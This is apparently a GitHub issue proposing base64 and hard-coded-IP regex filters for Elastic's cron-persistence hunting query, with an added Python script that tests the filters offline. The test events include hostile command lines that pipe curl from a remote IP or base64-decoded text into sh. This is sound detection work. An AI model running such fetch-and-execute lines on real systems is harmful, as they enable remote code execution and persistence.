Link to Rule
https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_cron.toml
Rule Tuning Type
None
Description
It might be interesting to also include the possibility of base64-encoded strings in the crontab or IP connections. Hope the regex is correct.
// RLIKE matches the whole value, so wrap in .* and escape the IP's dots; inspect the command line, since the parent name is already pinned to cron/fcron/atd.
//| WHERE process.command_line RLIKE """.*[0-9]{1,3}(\.[0-9]{1,3}){3}.*""" // Find hard-coded IP addresses (also matches version strings like 1.2.3.4)
//| WHERE process.command_line RLIKE """.*[A-Za-z0-9+/]{8,}==.*""" // Find Base64 strings (ending in ==); single-= or unpadded strings are missed
Example Data
from logs-endpoint.events.process-*
| WHERE @timestamp > now() - 30 day
| WHERE host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.parent.name in ("cron", "fcron", "atd")
// Proposed additions (commented out): enable one, or OR them in a single WHERE (two WHERE lines would be ANDed).
// RLIKE matches the whole value, so wrap in .* and escape the IP's dots; inspect the command line, since the parent name is already pinned to cron/fcron/atd above.
//| WHERE process.command_line RLIKE """.*[0-9]{1,3}(\.[0-9]{1,3}){3}.*""" // Find hard-coded IP addresses (also matches version strings like 1.2.3.4)
//| WHERE process.command_line RLIKE """.*[A-Za-z0-9+/]{8,}==.*""" // Find Base64 strings (ending in ==); single-= or unpadded strings are missed
| STATS cc = count(), host_count = count_distinct(host.id) by process.command_line
| WHERE host_count <= 3
| SORT cc asc
| LIMIT 100
(lines 4 and 5 are commented out)
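As an added example, not part of this issue or of the detection-rules repository: the hunt's cron-parent filter, the two proposed regex filters and the rarity aggregation re-implemented in Python over a handful of constructed process events, so the filters can be checked offline before touching the ES|QL. Python's `re.fullmatch` is used to mirror the whole-string semantics of ES|QL `RLIKE`, which is why the same `.*` wrapping is needed in both. The event dicts, host ids and command lines are made up for the demonstration; `hunt`, `rare_commands` and `cron_children` are illustrative names, not anything from the rule file.

```python
"""Offline re-implementation of the persistence_via_cron hunt over constructed events."""
import re
from collections import defaultdict

# Constructed sample process-start events (not real telemetry). The field names mirror
# the ECS fields the ES|QL query reads. The php job runs fleet-wide and should fall out
# of the rarity filter; the last event is not cron-spawned and must be dropped up front.
EVENTS = [
    {"host.id": "h1", "process.parent.name": "cron", "process.command_line": "/usr/bin/php /var/www/cron.php"},
    {"host.id": "h2", "process.parent.name": "cron", "process.command_line": "/usr/bin/php /var/www/cron.php"},
    {"host.id": "h3", "process.parent.name": "cron", "process.command_line": "/usr/bin/php /var/www/cron.php"},
    {"host.id": "h4", "process.parent.name": "cron", "process.command_line": "/usr/bin/php /var/www/cron.php"},
    {"host.id": "h1", "process.parent.name": "cron", "process.command_line": "/bin/sh -c 'curl -s http://203.0.113.10/x | sh'"},
    # base64 of "curl http://evil/" (17 bytes): padded with a single '=', so a '=='-only regex misses it
    {"host.id": "h2", "process.parent.name": "atd", "process.command_line": "/bin/sh -c 'echo Y3VybCBodHRwOi8vZXZpbC8= | base64 -d | sh'"},
    # base64 of "echo hi" (7 bytes): padded with '=='
    {"host.id": "h2", "process.parent.name": "fcron", "process.command_line": "/bin/sh -c 'echo ZWNobyBoaQ== | base64 -d | sh'"},
    # shell string comparison: contains '==' but no base64 run in front of it
    {"host.id": "h4", "process.parent.name": "cron", "process.command_line": "/bin/sh -c '[ \"$HOME\" == /root ] && logger ok'"},
    {"host.id": "h3", "process.parent.name": "bash", "process.command_line": "/usr/bin/curl http://203.0.113.10/x"},
]

# ES|QL RLIKE matches the *entire* field value, so a substring pattern must be wrapped in
# .* on both sides. re.fullmatch has the same semantics, which rlike() relies on.
IP_RE = re.compile(r".*[0-9]{1,3}(\.[0-9]{1,3}){3}.*")        # dotted quad anywhere; also hits version strings like 1.2.3.4
B64_RE = re.compile(r".*[A-Za-z0-9+/]{8,}==.*")                # run of base64 alphabet ending in '==' (8 is a tuning knob)
ORIGINAL_IP_RE = re.compile(r".[0-9]{1,3}(.[0-9]{1,3}){3}.")   # as first posted: unescaped dots, no .* wrapper

CRON_PARENTS = ("cron", "fcron", "atd")


def rlike(value: str, pattern: re.Pattern) -> bool:
    """Whole-string match, like ES|QL RLIKE."""
    return pattern.fullmatch(value) is not None


def cron_children(events):
    """WHERE process.parent.name in ("cron", "fcron", "atd")"""
    return [e for e in events if e["process.parent.name"] in CRON_PARENTS]


def rare_commands(events, max_hosts=3):
    """STATS cc = count(), host_count = count_distinct(host.id) BY process.command_line
       | WHERE host_count <= max_hosts | SORT cc ASC   -> list of (command_line, cc, host_count)"""
    counts = defaultdict(int)
    hosts = defaultdict(set)
    for e in events:
        cl = e["process.command_line"]
        counts[cl] += 1
        hosts[cl].add(e["host.id"])
    rows = [(cl, counts[cl], len(hosts[cl])) for cl in counts if len(hosts[cl]) <= max_hosts]
    rows.sort(key=lambda r: r[1])  # stable sort keeps first-seen order among equal counts
    return rows


def hunt(events, pattern=None, max_hosts=3):
    """The full pipeline: cron-spawned only, optional RLIKE-style filter, then rarity aggregation."""
    candidates = cron_children(events)
    if pattern is not None:
        candidates = [e for e in candidates if rlike(e["process.command_line"], pattern)]
    return rare_commands(candidates, max_hosts)


if __name__ == "__main__":
    for label, pat in (("no regex", None), ("IP (fixed)", IP_RE), ("IP (as posted)", ORIGINAL_IP_RE), ("base64", B64_RE)):
        print(f"== {label} ==")
        for cl, cc, hc in hunt(EVENTS, pat):
            print(f"cc={cc} hosts={hc} {cl}")
```

Running it shows the fleet-wide php job dropping out on the host-count threshold, the as-posted IP regex matching nothing because `RLIKE`-style whole-string matching needs the `.*` wrapper, and the single-`=` base64 payload slipping past a `==`-only pattern; loosening the padding to `={0,2}` catches it at the cost of more noise.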